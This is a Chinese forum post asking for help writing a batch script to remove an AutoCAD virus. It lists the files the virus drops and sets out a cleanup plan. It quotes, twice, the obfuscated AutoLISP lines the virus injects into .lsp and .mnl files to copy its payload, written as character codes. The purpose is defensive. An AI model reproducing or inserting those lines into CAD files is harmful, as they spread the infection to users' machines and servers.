求幫忙寫一個cad殺毒的bat(已解決)最后由 195135692 于 -8-16 09:38背景： 本人只不會寫批處理，用cad多年，目前公司有autocad和mechanical兩個軟件中毒，很煩人，下載了多個殺軟，不能根本解決問題。病毒傳播方式有1、分別在某些lsp和mnl文件中插入以下代碼(在不同的文件中，可能只有以下的一行，可能有三行，可能重復(fù)的不連續(xù)的有很多行)（loadacadapp.lsp)（loadacadapq.lsp)(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))2、在系統(tǒng)安裝盤下(是XP或win7的系統(tǒng)安裝盤)下生成boot.dat文件（不是boot.ini）3、在cad的安裝路徑文件夾help下生成logo.gif文件4、在新開或打開過的cad文件目錄下生成acad.vlx、acaddoc.lsp、acadapq.lsp、acad.lsp、acadapp.lsp、acadappp.lsp、acadiso.lsp文件，包括本機的文件和服務(wù)器上的文件(當(dāng)然是有權(quán)限寫的路徑)5、感染acad.fas、acaddoc.fas、lcm.fas文件(這個還不知道是怎么傳染的，只知道刪除了就會沒事，不刪病毒就會復(fù)發(fā)）根椐本人幾個月的試驗，病毒只能新建和修改可讀寫的文件，對于只讀文件還不能修改6、病毒跟注冊表沒有關(guān)系，以上是我通過幾個月的實驗得出的殺毒思路:找出病毒文件，刪除惡意代碼或文件，存為只讀1、找系統(tǒng)安裝盤下有沒有boot.dat文件，如有則清除文件內(nèi)容，并存為只讀。因為不是每個系統(tǒng)都在C盤，也可以全盤搜索boot.dat2、找cad軟件在cad的安裝路徑文件夾help下生成logo.gif文件，如有則清除文件內(nèi)容，并存為只讀。因為不是每次cad軟件都在D盤，也可以全盤搜索logo.gif3、搜索acad.vlx、acaddoc.lsp、acadapq.lsp、acad.lsp、acad.fas、acad.sys、acadapp.lsp、acadappp.lsp、acaddoc.fas、acadiso.lsp、lcm.fas、acadsmu.fas文件并刪除，最好能包括服務(wù)器的路徑，比如mainserver工程部資料臨時放置區(qū)4、本機全盤搜索*.lsp和*.mnl文件，并在其文件中查找以下三行代碼之一，并刪除，這三行代碼不一定是同時存在的，同一行代碼在文件中可能不只一次出現(xiàn)（loadacadapp.lsp)（loadacadapq.lsp)(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))如文件有出現(xiàn)以上代碼的，刪除代碼后直接保存并存為只讀目前下載的專殺軟件，可能沒有做第1、2步，也沒有把文件存為只讀，因為殺完后很快的就中毒了。請各位高手幫幫忙。